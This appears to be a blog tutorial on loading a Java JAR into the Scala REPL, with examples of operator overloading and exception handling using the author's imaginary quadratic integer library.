Once you have the Scala REPL on your system and adjust your operating system’s environment path variable, you can run the Scala REPL from the command line with the command
scala.
If you don’t feel like adding it to your system’s path, you’ll have to navigate to the
scala\bin directory before you can start the REPL.
The most straightforward way to load your Java project into the Scala REPL is with the JAR file at the command line. Let’s say the Scala REPL is in your path variable and you have navigated to the folder with the JAR.
On NetBeans, the JAR folder path might be something like
NetBeans Projects\MyProgram\dist\MyProgram.jar.
On IntelliJ, it might be more like
IDEA Projects\MyProgram\out\artifacts\myprogram_jar\MyProgram.jar. I don’t know about Eclipse.
Then you type in something like
scala -cp MyProgram.jar. Give the JVM a second or two to start up. You should see something like this:
Welcome to Scala 2.12.6 (Java HotSpot(TM) 64-Bit Server VM, Java 1.8.0_161).Type in expressions for evaluation. Or try :help.
First I’d try something very simple, just to make sure everything’s in working order.
scala> 1 + 1
res0: Int = 2
Next, to remind myself that this is Scala, not Java:
scala> 3.getClass
res1: Class[Int] = int
That
res0 and
res1 stuff is so that you can access previous results. You can do something like
res0 + 1, for example.
Maybe there’s a better way, but as far as I can tell, to access the classes you loaded with the JAR file, you need to qualify the class names with the relevant package names, e.g.,
mainpackage.MainClass to access
MainClass in
mainpackage.
In my case, I loaded a very recent version of my
ImaginaryQuadraticInteger project (available from my GitHub repository).
That one consists of two packages:
imaginaryquadraticinteger (which contains almost all the code) and
filefilters. Maybe the project needs to be broken up into smaller packages, but that’s a discussion for another day.
So, to create a new ring object, just
new ImaginaryQuadraticRing won’t do.
scala> val ringZi2 = new imaginaryquadraticinteger.ImaginaryQuadraticRing(-2)ringZi2: imaginaryquadraticinteger.ImaginaryQuadraticRing = Z[?-2]
Uh oh. The square root character was changed to a question mark. It seems that all the console fonts on my system are strictly limited to ASCII.
Well, both
ImaginaryQuadraticRing and
ImaginaryQuadraticInteger have
toASCIIString() functions. Hmm… maybe I could create Scala classes that extend those two classes for the sole purpose of rerouting
toString() to
toASCIIString().
But if I’m going to do that, I might as well overload the basic arithmetic operators. Like, for example, the plus operator for
ImaginaryQuadraticInteger, which I put in the Scala class I’ve named
ImagQuadInt:
def +(summand: ImagQuadInt): ImagQuadInt = {
val temp = this.plus(summand)
new ImagQuadInt(temp.realPartMult, temp.imagPartMult,
temp.imagQuadRing, temp.denominator)
}
In most Scala operator overload examples, you’ll see
that or
other to refer to the second operand. Neither of those is a reserved Scala keyword, so I prefer to use a more meaningful word, “summand” in this case.
If you want to see the subtraction, multiplication and division overloads, they’re all in the GitHub repository I linked earlier.
So now in the Scala REPL I can do stuff like this:
scala> var numberC = numberA * numberBnumberC: imaginaryquadraticinteger.ImagQuadInt = 5 + sqrt(-2)
Obviously
numberC can’t be prime. I wrote a function to make that determination in the
NumberTheoreticFunctionsCalculator class of the
imaginaryquadraticinteger package. At this point I’m really wishing I had given that one a shorter name, like maybe
NTFC.
scala> imaginaryquadraticinteger.NumberTheoreticFunctionsCalculator.isPrime(numberC)res7: Boolean = false
Some of you might be thinking “big deal, so what, Wolfram Alpha can do that.” Yeah, as long as you don’t ask that question about a prime number like 1 + √−2.
Mathematica wouldn’t be able to make that determination either, not unless you programmed it for that, or if they add that capability in a future version.
Lastly, I’d like to leave you with an example of something that feels almost ridiculous in a REPL: throwing and catching exceptions.
scala> try { numberC/numberA } catch { case nde: imaginaryquadraticinteger.NotDivisibleException => notDivExc = nde }
res42: Any = ()scala> notDivExc
res43: imaginaryquadraticinteger.NotDivisibleException = imaginaryquadraticinteger.NotDivisibleException: -16 + 19sqrt(-2) is not divisible by 4 + 2sqrt(-2).scala> notDivExc.roundTowardsZero
res45: imaginaryquadraticinteger.ImaginaryQuadraticInteger = 4?(-2)scala> notDivExc.getBoundingIntegers
res46: Array[imaginaryquadraticinteger.ImaginaryQuadraticInteger] = Array(4?(-2), 1 + 4?(-2), 5?(-2), 1 + 5?(-2))
I hope this gives you a taste of what can be done in the Scala REPL.
|
https://alonso-delarte.medium.com/using-the-scala-repl-as-a-makeshift-java-repl-a0004d2fcdb7
|
CC-MAIN-2021-21
|
refinedweb
| 2,024
| 61.26
|
Serializing Your Structs Using XML
Introduction
This article shows how to save a struct into an XML file (using STL), and load it back using Microsoft's MSXML 3.0 parser. If you have Microsoft's MSXML 4.0 parser installed, modify the stdafx.h file to use MSXML4 instead of MSXML3. This code can be modified to use a class instead of a struct.
Using the Code
To implement this code in your project, add a call to initialize OLE support by inserting a call to ::AfxOleInit in the application class' InitInstance function. In my demo, this class is called CSerializeApp.
BOOL CSerializeApp::InitInstance() { AfxEnableControlContainer(); . . . ::AfxOleInit(); // Because the dialog has been closed, return FALSE so // that we exit the application, rather than start the // application's message pump. return FALSE; }
#import <msxml3.dll> named_guids using namespace MSXML2;
Replace the 3 in msxml3.dll above with 4 if you have Microsoft's MSXML 4.0 parser installed. In addition, include the following to the stdafx.h file, right before the #import above:
#include <atlbase.h> // Needed for CComVariant.
Add the files SerializeXML.cpp/h to your project and modify the structs and function names to suit your needs. Finally, call the save/load functions you added to save/load your structures to XML files. In my demo application, I call everything from BOOL CSerializeDlg::OnInitDialog(), just to test it out.
Points of Interest
Introduction to Using the XML DOM from Visual C++ by Tom Archer.
DownloadsDownload demo project - 15 Kb
Download source - 3 Kb
NEVER place 'using namespace ...' in a header!!!Posted by Legacy on 05/08/2003 12:00am
Originally posted by: Jeff Flinn
NEVER, NEVER, NEVER place 'using namespace ...' in a header!!!Reply
|
http://www.codeguru.com/cpp/data/data-misc/xml/article.php/c4559/Serializing-Your-Structs-Using-XML.htm
|
CC-MAIN-2014-10
|
refinedweb
| 285
| 60.82
|
Hidden div tooltipJobs
..
Need someone to build a simple webview android app with a splash screen for me. Requir...to build a simple webview android app with a splash screen for me. Requirements: -The webview must open in app screen. Not separate browser tab -Browser search bar must be hidden -Clicked links in the webview should open in separate browser tab My budget is $30
...[log ind for at se URL] 2. We have issues with our search function on property pages where the two tabs, For Rent and For Sale are hidden behind the header. Attached screenshot. 3. On property listings and on property pages I would to have a Sales & Rent price in all applicable areas as follows: Sales Price:
Simple static wordpress website based on standard theme. I want a list of hidden links possibly present in the website.
.. above will be
..
..
..
...be changed and it should read cities from Database and it should moved from middle of the page to the header. 2: I added categories down to the Header which this should be hidden from other Domains like Org. .co.uk. Those domains required different text. 3:User profile needs to be re-designed only css changes required 4: Search page required some minor
..
I need an Android app. I would like it designed and built.
.. on the social styles
...short,
...conflicting times or dates or driver or cars. ( our idea is we have a calendar to click on and time tree ( which NO INFO IS PROVIDED) about what we have already booked this is all hidden but we do want available dates or times or vehicles to be shown. we want a calendar that is able to be popped up with available dates and pop up when something interferes
.. and LAN) and time settings via our application this would be a bonus
...ended. Capability to create custom pages like news or recommended events/matches. ----------------------------- Other general features: * 100% opensource. I don't want hidden superusers. * Security features on the code to avoid cheating (as sql injection, url commands, etc). Ok, the website will not handle real money, just points, but it does
I have a phonegap app with inappbrowser. I want to show a custom navigation menu on top of the inappbrowser. The navigation i have gets hidden by the inappbrowser.
We need SEO for Our web...10 keywords Requirements: - Website analysis & On Page SEO - Offsite Links (200 per month) - 10 Keywords - On Page SEO Report + Weekly reports - Breakdown of cost (Hidden cost will be reported) - Must achieve top ranking (within the first page) in white SEO techniques. BUDGET: SGD $30 to $50 MAX. DONT OVERBID, please.
...[log ind for at se"]<...
.. [log ind for at se URL], [log ind for at se URL], [log ind for at se URL] date etc. displayed inli...
... Firefox or any designated brower that is installed on the Windows PC. Website URLs, Logins, and passwords are stored in an [log ind for at se URL] which is an encrypted text TXT file hidden somewhere on the Windows PC. Inside this file there will be multiple Browers, Website URLs, Logins, and Passwords (one per line where each line separated by | ) Example:
Hello! So I need a teaser for an upcoming festival. It's supposed to be mysterious, playful and exciting. Something that really gives the viewer a fe...the viewer a feeling of "oh, what is this" "i need to know more" (you know, the typcial teaser). So the mysterious part is really important, it should almost be cryptic, like hidden messages and so on.
Vær venlig at Tilmelde dig eller Log ind for at se detaljer.
...I have a simple working version that does some of the scraping and now want to extend it but have run into a skill bottleneck when it comes to dealing with the cookies and hidden state variables and collecting these after making changes to some form inputs (I have tried 'from_request' but haven't been able to get it to work). The data itself can be
I have a geo-location script running in an [log ind for at se URL] file. Need 4 values parsed to a a...
...analysis & On Page SEO - Offsite Links (300 per month) -)
...analysis & On Page SEO - Offsite Links (200 per month) -)
...Auto match, advanced search by attributes, map search. - Template message, customised message, live txt chat, live video chat (video server already developed). Block user. - Hidden photos, user can hide photos and releases only to selected other users. - Package system > free, contact allowed, highlighting, extras (e.g. see when other logged in) - Favourite
...them better for this. At the bottom, please embed my calendly link: <!-- Calendly inline widget begin --> <div class="calendly-inline-widget" data-</div> <script type="text/javascript" src="[log ind for at se URL]"></script> <!--
I wanna build the trading web application using node.js to get information from [log ind for at se URL] like transaction orders included hidden order, buy order, sell orders, and checkpoint of account position. If you have good experience in trading using bot, then share your examples to check your skillset before contact here. Before start your proposal must %}{{ [log ind for at se URL]|raw }}{% endif %}</div> Build an array with the aforementioned [1] urls [2] alt tags and [3] i...
Hello there, I have a profile registration form, each field / input with its own ID. 1. I need to wrap some elements inside a Div. 2. I need to make an existing toggle to Show/Hide the Div wrap. 3. I need to make the same toggle to change the selected element of a dropdown. I need someone with expertise on jQuery, and with availability to do this
...object has no attribute 'logo' Error to render compiling AST AttributeError: 'NoneType' object has no attribute 'logo' Template: [log ind for at se URL] Path: /templates/t/t/div/header/nav/div/a/span Node: <span t-field="[log ind for at se URL]" t-options="{'widget': 'image'}" role="img" t-attf-src...: [log ind for at se URL]
...should be visible: If they aren't hidden by someone/something in the video, or are turned away so that no part of the face is visible, then their face should be hidden by the blur. b) If they were your friends, you still wouldn't be able to identify them. You may suspect, but you can't be sure. That's how well hidden I want their face to be. If you...
...select on the text and click on a button, a panel will display and when you click on the input textbox, the select text in the div contenteditable will be disappears. I want you to fix the issue to keep the select text in the div contenteditable when I select on the input textbox. I will give you my ftp for you to work on. When you are done, I will reward
..
One or more keywords ar...Starting from 0.1 months to 100 years. Upon chosen month/year a value is created (The initial value is hidden) Range slider, from 0% to 100% with titles placed above at 0%, 25%, 50%, 75% Upon chosen title/% a value is created (The initial value is hidden) All three values are calculated and added together and shown to user,
...product page ( shows on every product). I have installed the Advanced Custom field plugin which I want to use for that task. The fields should show up only when are filled and be hidden when there are no details for it. I attached a screenshot showing sample fields which will be added. The WordPress login details will be shared when you are able to complete
...And I want you to fix my edit-link to update the link in the div textbox. When I add the link and text, it will put the href link in the div textbox so when I highlight on the text and click on the edit link button, when i change the text and link it will add the text and link in the div textbox. It should have remove the old text and replace a new
...wallets everyday (EOD). Description: Main Functionality: • Admin should be able to generate unique bar code for every products. • Each bar code has particular amount of hidden cashback in form of percentage (from 1-100%). • Admin can define percentage while uploading products. • Once bar code is printed on product and shipped to customer successfully
Hi there, I need some urgent help to customise the tooltip overlays in a Mapplic map. Mapplic is a Wordpress plugin. Please modify the existing layout to look like the example provided. Please add the "fly-out" style that looks almost like a comet tail. Please remove the title .e.g "Frenchman Peak". Please reduce the size of the feature image and have
...where she interviews celebrity guests and focuses on the latest beauty trends, from the makeup aisle to the operating table. My ReachTV site: [Link Address Hidden] my website:[Link Address Hidden]...
...I am trying to achieve: <div id="column1" class="columns"> <div id="5" class="dragbox"> </div> <div id="3" class="dragbox"> </div> <div id="1" class="dragbox"> </div> </div> <div ...
... The neural network must have one input node for each character in the input string, and one output node for each character in the output string. The number and size of hidden layers should be configurable to allow more complex operations to be performed. As an example, Given a training data as follows; 123ABC,234CBA 124ABC,125CBA 526DEF,637FED
Vær venlig at Tilmelde dig eller Log ind for at se detaljer.
...players to join. It should include : * A deck area only visible to the player. * Another hidden area where they can move cards from their deck (showing the card back to other players while within this space). * A visible area where they can move these cards from then hidden area (making them visible). * And a track that the cards move onto at the end of the
|
https://www.dk.freelancer.com/job-search/hidden-div-tooltip/
|
CC-MAIN-2019-26
|
refinedweb
| 1,677
| 73.37
|
We recently updated the Bing Maps AJAX Control v7 a week ago with some new features. Check out the official announcement on the Bing Maps Blog if you missed it. Here are some details for developers of the new features in this update:
- New Bing Maps AJAX Control 7.0 interactive SDK which shows interactive samples of how to use the different features of the Bing Maps AJAX Control v7. The interactive SDK has code samples you can run and see the source code for and makes it very easy to try out APIs and build applications with the v7 control.
- New inertia feature which animates the map when panning the map. This provides a nice effect especially on touch devices where you can flick the map. The useInertia and inertiaIntensity properties were added to the MapOptions. By default useInertia is set to true and the inertiaIntensity option is set to 0.85. You can adjust these properties to turn off or customize the inertia effect.
- New backgroundColor property was added to the MapOptions. This allows you to modify the color behind the map imagery.
- New tileBuffer property was added to the MapOptions which allows you to customize how many buffer tiles appear outside the map view. By default it is set to 0. This option specifies the number of buffer tile rows to load outside the map control view boundary. This setting allows you to customize the map experience for more visual smoothness when panning.
- New fixedMapPosition property was added to the MapOptions. This setting by default is false. Setting this to true can improve performance of the map control when you position the map control in a div that will not be resized or moved on the page. This primarily is for mobile web applications that may have a fixed screen size or a browser that will not resize the page.
- New dynamic module loading support for the creation of modules to add on to the v7 control. The loadModule, registerModule, and moduleLoaded methods have been added to the Microsoft.Maps namespace for module registration and loading. See the Module Loading methods topic in the MSDN documentation for more details.
- New GeoLocationProvider class was added with geolocation methods that make it easier to detect and display a user’s location on the map. This feature leverages the W3C Geolocation API specification and is supported on browsers that have support for it.
- New asynchronous loading support for performance improvements on web pages that load content in parallel. If you want to load the map control asynchronously in parallel with other items on your page, use the onscriptload parameter on the map control handler. See the Setting Map Control Parameters topic on MSDN for more details
For more details on using the Bing Maps AJAX Control v7, see the AJAX v7 interactive SDK or Ajax v7 SDK documentation.
It would have saved us a lot of time and effort if Microsoft would have changed the Version 7.0 to 7.0.1 or something similar. This Update cost us a lot of Money and Time on a project that was almost complete at the time of the update.
Please talk to the Bing Team and encourage them to improve this Update process! They almost destroyed our company with their Update. We're a 2 man consulting team and this project was our big money maker. We rolled the dice with Bing Ajax 7 and almost lost all of our Profit on this project.
Thanks Harry for the feedback. We are sorry this update inadvertently affected some customers when we switched to support asynchronous loading for improved performance. It was not our intention to introduce breaking changes to the v7 API. Ultimately we corrected this issue shortly after this update. We are working hard to ensure that future updates do not break existing APIs.
|
https://blogs.msdn.microsoft.com/keithkin/2011/05/16/update-to-bing-maps-ajax-control-v7/?replytocom=1413
|
CC-MAIN-2018-09
|
refinedweb
| 643
| 64.61
|
ASP.NET Tip: Creating a Composite Web Control
Adding user controls to a web application is a fairly easy thing to do. You essentially create a portion of a web page, add your HTML, and then use the control within your application. Although easy to create, user controls are harder to share between projects. As an alternative to user controls, you can create a new web control in a separate library. This type of control—a composite control—is harder to create but much easier to share between applications. This tip demonstrates how to create a relatively simple composite control.
A composite control is one made up of other built-in controls, such as text boxes. You also can create a control from scratch if you don't want to use the built-in controls. This example, however, puts three text boxes together to allow a user to enter a date. It'll have a little bit of logic to combine the values of the boxes into a single date.
To build the example application, you need two projects: a Web Control Library project and a web site project. When you're building a web control, you house a control within a class file. In this case, the DateEditBox control class, which just shows three text boxes on the screen, is shown here:
namespace MyControls { [DefaultProperty("Value")] [ToolboxData("<{0}:DateEditBox runat=server></{0}:DateEditBox>")] public class DateEditBox : CompositeControl { private TextBox txtMonth = new TextBox(); private TextBox txtDay = new TextBox(); private TextBox txtYear = new TextBox(); protected override void OnInit(EventArgs e) { base.OnInit(e); txtMonth.ID = this.ID + "_month"; txtMonth.MaxLength = 2; txtMonth.Width = this.Width; txtDay.ID = this.ID + "_day"; txtDay.MaxLength = 2; txtDay.Width = this.Width; txtYear.ID = this.ID + "_year"; txtYear.MaxLength = 4; txtYear.Width = this.Width; } [Bindable(true)] [Category("Appearance")] [DefaultValue("")] [Localizable(true)] public DateTime Value { get { EnsureChildControls(); if (txtMonth.Text == "" || txtDay.Text == "" || txtYear.Text == "") return DateTime.MinValue; else return new DateTime(Convert.ToInt32(txtYear.Text), Convert.ToInt32(txtMonth.Text), Convert.ToInt32(txtDay.Text)); } set { EnsureChildControls(); txtMonth.Text = value.Month.ToString(); txtDay.Text = value.Day.ToString(); txtYear.Text = value.Year.ToString(); } } protected override void CreateChildControls() { this.Controls.Add(txtMonth); this.Controls.Add(txtDay); this.Controls.Add(txtYear); base.CreateChildControls(); } public override void RenderControl(HtmlTextWriter writer) { writer.RenderBeginTag(HtmlTextWriterTag.Table); writer.RenderBeginTag(HtmlTextWriterTag.Tr); writer.RenderBeginTag(HtmlTextWriterTag.Td); txtMonth.RenderControl(writer); writer.RenderEndTag(); // td writer.RenderBeginTag(HtmlTextWriterTag.Td); writer.Write("/"); writer.RenderEndTag(); // td writer.RenderBeginTag(HtmlTextWriterTag.Td); txtDay.RenderControl(writer); writer.RenderEndTag(); // td writer.RenderBeginTag(HtmlTextWriterTag.Td); writer.Write("/"); writer.RenderEndTag(); // td writer.RenderBeginTag(HtmlTextWriterTag.Td); txtYear.RenderControl(writer); writer.RenderEndTag(); // td writer.RenderEndTag(); // tr writer.RenderEndTag(); // table } } }
There's a lot going on in this class. To begin with, the declaration of the class includes a couple of attributes required to make the control work on the web page. The first is the default value, which is specified as your Value property. The second is the format used when someone wants to add the control to a web page, typically by dragging the control from the Visual Studio toolbox. You also should note that this class derives from CompositeControl, which is a class designed specifically for controls that use only built-in controls. See the help for more details on what this base class includes.
In the OnInit event, set some attributes on the child controls; they are txtMonth, txtDay, and txtYear. Copy the CssClass and Width properties from the parent control to the child controls, which lets these controls use attributes specified on the parent for control. You also could add extra properties to the class to control each child control if you wanted to. You also set the ID properties of each child control to be prefixed by the ID assigned to the parent control. This lets you access the child controls later.
You then have your Value property, used to set and read the value of the composite control. As part of your basic validation, send back the date only if all three boxes are filled in. You could also add extra validation here to make sure that the fields are numeric. The set portion of the property breaks the specified date into three parts to fill each of the three boxes.
Now, you have the CreateChildControls method, followed by the RenderControl method. The CreateChildControls is responsible strictly for getting the controls into the page for postback use. If you leave out this method, your child controls won't have the ability to maintain viewstate. The RenderControl method is responsible for showing the web control on the web page. In this case, you show the three textboxes in a table like this:
table tr td [txtMonth] /td td [/] /td td [txtDay] /td td [/] /td td [txtYear] /td /tr /table
The HtmlTextWriter control includes methods to properly add and close table cells, as well as all the other defined HTML tags. This method takes care of displaying your control on the web page. To use this control in a separate web page, you need to reference your project and then, on the page where you want to use it, add this directive:
<%@ Register Assembly="MyControls" Namespace="MyControls" TagPrefix="MC" %>
Once that reference is in place and the web project has a copy of the MyControls DLL, you'll get the IntelliSense to add MC:DataEditBox as a control. From your code-behind, you can look at the control's Value property and set the Width to control the width of each box that makes up the control.
Covering the Basics
There are lots of other features you could add, but this tip showed you just the basics required of every composite control: creating the child controls, setting the ID properties, adding them to the Controls collection, and then rendering the control. After that, you can add any extra properties, methods, or events to make the control an even more valuable part of your web toolbox..
compiling\debugging the Composite Web ControlPosted by PatBad on 02/22/2007 12:27pm
Hi I have a similar project like tis one. When I compile the dll with vbc I can reference the dll in the Visual Studio web solution project and it works! If instead I compile the dll as a Web Control Library (same source code file both times) I get the "Unknown server tag " error. Any idea?Reply
|
https://www.codeguru.com/csharp/.net/net_asp/webforms/article.php/c12725/ASPNET-Tip-Creating-a-Composite-Web-Control.htm
|
CC-MAIN-2018-26
|
refinedweb
| 1,061
| 55.34
|
Type: Posts; User: mot1639
HI all ,
I make simple electronic module witch connect to modem and send data to server appliction has been made by vb6 , now when huge data come i cant receive the data from my module but with...
Hi all ,
now form 5 days and i am trying to forward or resend sms from index ...but i cant , using AT command
the problem that i have receive mulipart sms (long sms via my phone nokia 6230)but...
hi all
this is my code
#include <iostream>
#include <fstream>
using namespace std;
hi all ,
i have daragride view connect to Access data base, my question is that, how i can delete a specific row when i click on it from datagride and database ????
this is a data grid ...
...
any Help her ??
no it is not a homework ,,,,, ????!!! i already build a application between the GUI and the access database ... the only question how to insert the a barcode in the access and print it ?
hi all ,
i have barcodex ... also i have OLE Object filed in my access ..
how i can save this barcode in the access also how i can print the barcode ???
regards for all and i will...
hi
i write this code but i phase a problem :::
her the code
#include<iostream.h>
#include<conio.h>
int main()
hi all
i need support to find a a specific data from sentence, the data have a fixed length which is 9
for example i have sentence
test 888508432199 this is test
now to take...
there no one know a soulation ???
regards
hi all
i write this code and it work fine to split the text to equal part
put the problem is that ....
for example i need to see a msgbox with only max characters of "45" there no problem...
sorry for that
the error is her (((((( secondList = first;)))))
void linkedListType<Type>::splitAt(linkedListType &secondList,
const Type& item)
{...
hi all,
Suppose myList points to a list with the elements 34 65 27 89 12 (in this order). The statement
myList.splitMid(sublist);
splits myList into two sublists: myList points to the list with...
what i need is that
For fI1 = 1 To 31
If xlsheet1.Cells(fI1, 1) = "" Then
xl.ActiveWorkbook.Close False, CStr(App.Path & "\12.xls")
Else
cl...
Option Explicit
Dim xl As New Excel.Application
Dim xlsheet As Excel.Worksheet
Dim xlsheet1 As Excel.Worksheet
Dim xlwbook As Excel.Workbook
Private Sub Command1_Click()
Dim fI As Integer...
thanks , yes i write the code in VB6, can you help me how to start ??
regards
hi,
i try so hard to solve this problem but i still face problem
Now I Have Excel Sheet which contain /28/30/31 row depend on MOnth, some month have 30 day or other 31 day or 28 day.
My...
|
http://forums.codeguru.com/search.php?s=c8469ea48325421d27528ebf171d2f6e&searchid=965465
|
CC-MAIN-2013-20
|
refinedweb
| 470
| 83.15
|
I'm setting up a finite state machine structure as a proof of concept to be used in other projects. The states have function pointers that point to actions they are allowed to perform during certain events and transitions. I'm trying to restrict these pointers to be a part of a certain namespace, but the compiler doesn't recognize the namespace. The exact error is " StateAction': is not a class or namespace name. I've whittled out code until just these lines below remain.
//In State.h file #pragma once #include "StateAction.h" class CState { public: void addAction(void (StateAction::*funcPtr)()) { m_func = funcPtr; } //error line private: void (StateAction::*m_func)(); //error line }; //In StateAction.h file #pragma once #include <iostream> namespace StateAction { void fun1(); void fun2(); }; //In StateAction.cpp file #include "StateAction.h" void StateAction::fun1() { std::cout << "func 1" << std::endl; } void StateAction::fun2() { std::cout << "func 2" << std::endl; }
Any suggestions are appreciated. Most searches on this error are about circular dependencies, so I haven't been able to find much info. Is it even possible to restrict a function pointer to a namespace? I'm almost positive I've done this before with classes.
|
https://www.daniweb.com/programming/software-development/threads/444855/namespace-function-pointers-not-a-namespace-name-error
|
CC-MAIN-2022-33
|
refinedweb
| 197
| 57.77
|
recvfrom - receive a message from a socket
#include <sys/socket.h>
ssize_t recvfrom(int socket, void *restrict buffer, size_t length,
int flags, struct sockaddr *restrict address,
socklen_t *restrict address_len);
The
- Either a null pointer, if address is a null pointer, or a pointer to a socklen_t object which on input specifies the length of the supplied sockaddr structure, and on output specifies the length of the stored address.
The recvfrom() function shall return the length of the message written to the buffer pointed to by the buffer argument. For message-based sockets, such as [RS]
SOCK_RAW].
Upon.
The recvfrom(), pselect, read, recv, recvmsg, send, sendmsg, sendto, shutdown, socket, write
XBD <sys/socket.h>
First released in Issue 6. Derived from the XNS, Issue 5.2 specification.
POSIX.1-2008, Technical Corrigendum 1, XSH/TC1-2008/0503 [464] is applied.
return to top of pagereturn to top of page
|
https://pubs.opengroup.org/onlinepubs/9699919799/functions/recvfrom.html
|
CC-MAIN-2019-30
|
refinedweb
| 148
| 64.61
|
Member
303 Points
Dec 17, 2018 10:53 PM|kmcnet|LINK
Hello everyone and thanks for the help in advance. I am trying to use an example located at:. I am having a problem with the code:); }
The line await DownloadUrlToFileAsync(mediaUrl, filePath); generates an error "The 'await' operator can only be used within an async method. Consider marking this method with the 'async' modifier and changing its return type to 'Task<ActionResult>'. The await function looks like:
private static async Task DownloadUrlToFileAsync(string mediaUrl, string filePath) { using (var client = new HttpClient()) { var response = await client.GetAsync(mediaUrl); var httpStream = await response.Content.ReadAsStreamAsync(); using (var fileStream = System.IO.File.Create(filePath)) { await httpStream.CopyToAsync(fileStream); await fileStream.FlushAsync(); } } }
copied straight from the Twilio example. I really don't have much experience using the Await function, so I'm not sure how to handle this. Any help would be appreciated.
"
All-Star
39341 Points
Dec 17, 2018 11:45 PM|mgebhard|LINK
The method that has the for loop needs an async too. The link illustrates this...
public class MmsController : TwilioController { private const string SavePath = "~/App_Data/"; [HttpPost] public async Task<TwiMLResult> Index(SmsRequest request, int numMedia) {); } var response = new MessagingResponse(); var body = numMedia == 0 ? "Send us an image!" : $"Thanks for sending us {numMedia} file(s)!"; response.Message(body); return TwiML(response); }
Is your code from a Web Forms application? Can you share your code?
Member
710 Points
Dec 18, 2018 02:21 AM|rubaiyat2009@gmail.com|LINK
Hi kmcnet,
your writing of Task is not proper. It will be in format
Task<string> DownloadUrlToFileAsync ( ....,....)
Also, you can only use
await in an
async method. Method what called DownloadUrlToFileAsync, cannot be async.
You'll have to use your own
async-compatible context, call
Wait on the returned
Task in the
Main method, or just
ignore the returned
Task and just block on the call to
Read. Note that
Wait will wrap any exceptions in an
AggregateException.
For more info you can see Async and Await
Pls don't forget to mark as answer, when my suggestion helps you. Thanks
Member
303 Points
Dec 18, 2018 03:07 AM|kmcnet|LINK
Thanks for the response. That took care of it. The application is MVC using controllers as endpoints. I'm following the example pretty closely, but will be more than happy to post the working code. I do have some other questions that I'm sure you can help with. Let me get it working and I'll post the code sometime tomorrow.
3 replies
Last post Dec 18, 2018 03:07 AM by kmcnet
|
https://forums.asp.net/t/2150498.aspx?Problems+with+Await
|
CC-MAIN-2019-22
|
refinedweb
| 433
| 68.36
|
Now we know a bit about plotting data and we have written some functions, like
trace_values,
layout, and
plot, to help us do so. You can view them here.
Imagine we are hired as a consultant for a movie executive. The movie executive receives a budget proposal, and wants to know how much money the movie might make. We can help him by building a model of the relationship between the money spent on a movie and money made.
To predict movie revenue based on a budget, let's draw a single straight line that represents the relationship between how much a movie costs and how much it makes.
Eventually, we will want to train this model to match up against an actual data, but for now let's just draw a line to see how it can make estimates.
from lib.graph import trace_values, plot, layout regression_trace = trace_values([0, 150], [0, 450], mode = 'lines', name = 'estimated revenue') movie_layout = layout(options = {'title': 'Movie Spending and Revenue (in millions)'}) plot([regression_trace], movie_layout)
By using a line, we can see how much money is earned for any point on this line. All we need to do is look at a given $x$ value, and find the corresponding $y$ value at that point on the line.
This approach of modeling a linear relationship (that is a drawing a straight line) between an input and an output is called linear regression. We call the input our explanatory variable, and the output the dependent variable. So here, we are saying budget explains our dependent variable, revenue.
Instead of only representing this line visually, we also would like to represent this line with a function. That way, instead of having to see how an $x$ value points to a $y$ value along our line, we simply could punch this input into our function to calculate the proper output.
Let's take an initial (wrong) guess at turning this line into a function.
First, we represent the line as a mathematical formula.
$y = x$
Then, we turn this formula into a function:
def y(x): return x y(0)
y(10000000)
This is pretty nice. We just wrote a function that automatically calculates the expected revenue given a certain movie budget. This function says that for every value of $x$ that we input to the function, we get back an equal value $y$. So according to the function, if the movie has a budget of $30$ million, it will earn $30$ million.
Take a look at the line that we drew. Our line says something different. The line says that spending 30 million brings predicted earnings of 90 million. We need to change our function so that it matches our line. In fact, we need a consistent way to turn lines into functions, and vice versa. Let's get to it.
We start by turning our line into a chart below. It shows how our line relates x-values and y-values, or our budgets and revenues.
Next, we need an equation that allows us to match this data.
What equation is that? Well it's $y = 3x$. Take a look to see for yourself.
Let's see it in the code. This is what it looks like:
def y(x): return 3*x
y(30000000)
y(0)
Progress! We multiplied each $x$ value by 3 so that our function's outputs correspond to the $y$ values appearing along our graphed line.
By multiplying $x$ by 3, we just altered the slope variable. The slope variable changes the inclination of the line in our graph. Slope generally is represented by $m$ like so:
$y = mx$
Let's make sure we understand what all of our variables stand for. Here they are:
Let's adapt these terms to our movie example. The $y$ value is the revenue earned from the movie, which we say is in response to our budget. The explanatory variable of our budget, $x$, represents our budget, and the $m$ corresponds to our value of 3, which describes how much money is earned for each dollar spent. Therefore, with an $m$ of 3, our line says to expect to earn 3 dollars for each dollar spent making the movie. Likewise, an $m$ of 2 suggests we earn 2 dollars for every dollar we spend.
A higher value of $m$ means a steeper line. It also means that we expect more money earned per dollar spent on our movies. Imagine the line pivoting to a steeper tilt as we guess a higher amount of money earned per dollar spent.
There is one more thing that we need to learn in order to describe every straight line in a two-dimensional world. That is the y-intercept.
- The y-intercept is the $y$ value of the line where it intersects the y-axis.
- Or, put another way, the y-intercept is the value of $y$ when $x$ equals zero.
Let's add a trace with a higher y-intercept than our initial line to the movie plot.
regression_trace_increased = trace_values([0, 150], [50, 500], mode = 'lines', name = 'increased est. revenue') plot([regression_trace_increased, regression_trace], movie_layout)
What is the y-intercept of the original estimated revenue line? Well, it's the value of $y$ when that line crosses the y-axis. That value is zero. Our second line is parallel to the first but is shifted higher so that the y-intercept increases up to 50 million. Here, for every value of $x$, the corresponding value of $y$ is higher by 50 million.
In addition to determining the y-intercept from a line on a graph, we can also see the y-intercept by looking at a chart of points.
In the chart below, we know that the y-intercept is 50 million because its corresponding $x$ value is zero.
The y-intercept of a line usually is represented by b. Now we have all of the information needed to describe any straight line using the formula below:
$$y = mx + b $$
Once more, in this formula:
So thinking about it visually, increasing $m$ makes the line steeper, and increasing $b$ pushes the line higher.
In the context of our movies, we said that the the line with values of $m$ = 3 and $b$ = 50 million describes our line, giving us:
$y = 3x + 50,000,000 $.
Let's translate this into a function. For any input of $x$ our function returns the value of $y$ along that line.
def y(x): return 3*x + 50000000
y(30000000)
y(60000000)
In this section, we saw how to estimate the relationship between an input variable and an output value. We did so by drawing a straight line representing the relationship between a movie's budget and it's revenue. We saw the output for a given input simply by looking at the y-value of the line at that input point of $x$.
We then learned how to represent a line as a mathematical formula, and ultimately a function. We describe lines through the formula $y = mx + b $, with $m$ representing the slope of the line, and $b$ representing the value of $y$ when $x$ equals zero. The $b$ variable shifts the line up or down while the $m$ variable tilts the line forwards or backwards. Translating this formula into a function, we can write a function that returns an expected value of $y$ for an input value of $x$.
|
https://learn.co/lessons/single-variable-regression
|
CC-MAIN-2019-43
|
refinedweb
| 1,237
| 71.44
|
